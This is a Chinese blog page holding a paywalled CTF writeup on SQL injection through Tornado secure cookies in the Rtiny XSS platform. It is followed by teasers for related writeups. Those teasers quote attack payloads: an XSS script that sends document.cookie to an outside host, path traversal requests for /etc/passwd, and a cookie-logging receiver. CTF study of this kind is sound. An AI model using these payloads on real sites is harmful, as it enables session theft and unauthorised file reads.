“百度杯”CTF比赛2017年2月场WP--XSS平台(Tornado secure cookie)

最新推荐文章于 2025-03-04 06:34:13 发布
最新推荐文章于 2025-03-04 06:34:13 发布
阅读量677 收藏 1
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Oavinci/article/details/94478324
版权
本文介绍了在“百度杯”CTF比赛中,通过分析rtiny项目的代码,发现Tornado框架中的secure cookie存在SQL注入漏洞。详细解释了Tornado的cookie处理机制,特别是set_secure_cookie和get_secure_cookie的功能。提到了伪造cookie的难度,因为需要密钥来生成正确的签名。提供了一种利用报错注入构造加密注入语句的方法,并给出了利用流程,包括使用Burp Suite抓包和修改请求参数。最后提醒注意cookie显示长度限制,可以使用mid或substr截取数据,并通过load_file读取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

 

构造错误数据,返回报错中发现有 rtiny

 

在GitHub上找到项目rtiny: https://github.com/r0ker/Rtiny-xss/tree/master

审查代码发现在 rinty\lock.py中存在sql注入漏洞,没有过滤

 

关于 secure cookie 的使用请参考:http://www.tornadoweb.org/en/stable/guide/security.html

tornado里面有关几个cookie的处理,一般在web.py文件里。

get_cookie, set_cookie普通的设置cookie, clear_cookie, clear_all_cookies是删除cookie。

还有两个是 get_secure_cookie, set_secure_cookie,这两个的功能是能够防止用户的cookie被伪造。

先看看函数处理方法。

最低0.47元/天 解锁文章
百度CTF比赛20172月WP--web
Oavinci的博客
06-02 1047
一、爆破-1 在php语言中,所有的已经定义的变量都会保存在GLOBALS全局数组中,比方说你定义了一个$name="李华",那么$GLOBALS['name']就等于“李华”。就是说,你可以通过这个全局数组来访问任何一个变量,所有已经定义过的变量都可以在里面通过变量名索引得到。 preg_match函数返回值为匹配到的次数。 审计代码可以知道,我们可以用GET传值方式?hello=...
百度CTF比赛 2017 二月--Zone
Oavinci的博客
05-17 722
提示未登录 BP抓包修改login=1,成功登录 点击manage抓包,修改login=1,返回包中发现有个302页面跳转 尝试访问系统配置文件 GET /manages/admin.php?module=/etc/passwd&name= 无回显 GET /manages/admin.php?module=../../../etc/passwd&name= 无回显 怀疑过滤了../ 尝试用..././ GET /manages/admin.php?modul...
CTF 中的 XSS 攻击:原理、技巧与实战案例
最新发布
weixin_62428445的博客
03-04 973
XSS 攻击指的是攻击者通过在 Web 页面中注入恶意 JavaScript 代码,使得这些代码在其他用户的浏览器中执行。通过这种方式,攻击者可以篡改页面内容、窃取用户 Cookie、劫持用户会话,甚至对用户进行钓鱼攻击。
百度CTF比赛 2017 二月 MiscWeb 爆破-1
qq_41475791的博客
11-26 293
打开题目的连接出现这串代码 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> 从代码***include “flag.php”;**...
XSS获取cookie并利用
kuxing100的专栏
07-11 1862
获取cookie利用代码cookie.asp xx msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值 set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象 set thisfile = fs.OpenTextFile(t
CTF练习】BUU XSS COURSE 1(XSS获取cookie登录)
m0_73866435的博客
02-28 4572
有两个尝试点。
百度2017二月-Zone
r00tnb的博客
07-26 1548
前言 这道题是我看了官方writeup才做出来的,最后是因为Nginx配置不当导致的漏洞,没错触及到了知识盲区,记录下来。 分析 点开题目链接,提示我必须登录。然后我习惯性的拿出burpsuite来抓包,发现Cookie字段中出现了可疑的login=0,于是改为1发送过去,就好啦。 HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Wed, 03...
百度CTF比赛 九月 XSS平台
苟有恒,必有三更眠,五更起。
11-01 1736
百度CTF比赛 九月 XSS平台 登录页面,开始时尝试注入,没有明显效果,无法判断是否存在注入。 一时没了思路,看了大佬的 WP,发现大佬们是通过构造错误参数使得web报错,从而收集信息,算是又学习到了一招。 于是,在burpsuite里面构造错误参数,报错得到信息 image 报错信息中有一个rtiny 在github上找到相应 ...
攻防世界-web高手进阶区
zji
04-25 6863
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
[WP/CTFshow]XSS Web316-333
車鈊的博客
07-11 1880
CTFSHOW WP 题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS 316.需要配套接收端XSS脚本 如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。 本解法直接将产生请求写在了表层。 <script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script> 3
ctf xss利用_CTF XSS
weixin_33945512的博客
01-14 1213
CTF XSS这一块接触的不多,这次先当搬运工,之后慢慢补上自己的东西渗透流程fuzz"'#$%^'";!-=#$%^&{()}alert(String.fromCharCode(88,83,83));prompt(1);confirm(1)绕过标签之间先闭合标签JS标签内空格被过滤:/**/输出注释中:换行符%0a``%0d字符串中闭合引号、宽字节文本属性中把所有的payload转为HTML M...
CTF一些入门题目的wp()
qq_41788666的博客
05-25 1742
1. XSS注入测试 题目链接(http://103.238.227.13:10089)        进入网页后发现        由题目原先的提示得知注入点为id(GET方法),查看网页源代码,发现如下代码         猜测应该是将s赋值为用户传上去的id的值        innerHTML无法执行进来的script  可以构造img标签来使script执行        测试一波:ht...
【web-ctfctf-pikachu-XSS
一个努力生活的人的博客
06-27 2878
XSS-pikachu
攻防世界31-easytornado-CTFWeb
LH1013886337的博客
10-20 453
返回{‘autoreload’: True, ‘compiled_template_cache’: False, ‘cookie_secret’: ‘8358f121-f98d-4964-9d92-0694dda574ed’}tornado在搭建一个网站时,肯定会有多个handler,而这些handler都是RequestHandler的子类 RequestHandler.settings又指向self.application.settings。msg={{7*7}} 显示orz,但是改成error?
ctfshow中Misc入门WP(超级全)
m0_46625346的博客
07-26 6158
misc42 misc43 提示:错误中隐藏着通往正确答案的道路 猜测与crc错误有关。 利用PCRT提取 PCRT:一款自动化检测修复PNG损坏的取证工具 可以在kali中安装PCRT:git clone https://github.com/sherlly/PCRT.git 然后 python PCRT.py -y -v -i misc44.png > 666.txt 把错误的code提出来用hex转字符 将这些提取出来,然后转16进制就可以。 E59387E5 93A62E63 7466736
[BJDCTF 2nd]xss之光 -wp
freerats的博客
08-04 555
打开容器就gungungun,其他啥也没有。 扫目录扫出git泄露 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 源码就这么短短三行。 一开始还想着是不是其他地方还会泄露另一部分源码,但是没找到。 参考其他wp才知道是利用php的原生类进行XSS 题目给的提示就是题目叫xss,说明需要xss。 echo unserialize($a); 可触发序列化中的魔术方法__toString Error 适用于php7版本 E
CTF学习笔记——Havefun&easy_tornado
Obs_cure的博客
08-23 1253
一、[极客大挑战 2019]Havefun 1.题目 2.解题步骤 虽然作为一个php废物,但是看到下面注释里写的明显是要提交一个get变量,而且很明显有一个dog的提示,就尝试输入一下: 成功爆出flag。 3.总结 这是第一次自己不看writeup做出来的web题,泪目。回头看了一些writeup发现这道题在给cat变量赋值的时候会显示出来,如果赋dog会出flag,但是输入其他值并没有回显,不清楚为什么。 二、[护网 2018]easy_tornado 1.题目 题目界面是三个文件夹,依次进入
CTF】buuctf web(二)——[护网 2018]easy_tornado
m0_52923241的博客
08-01 973
[护网 2018]easy_tornado 首先出来三个链接 查看flag.txt 提示flag在/fllllllllllllag中 OK,知道了第一个条件,filename=/fllllllllllllag 查看welcome.txt 查看hints.txt 分析一下 这里有两个参数,第一个参数filename,文件的名称,我们通过查看flag.txt文件知道,藏flag的文件名为fllllllllllllag;第二个参数filehash,翻译一下:文件哈希,也就是加密了 加密方法在第三个文件中md
[ctfhub]-xss详解
weixin_52116519的博客
04-28 5312
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射型XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值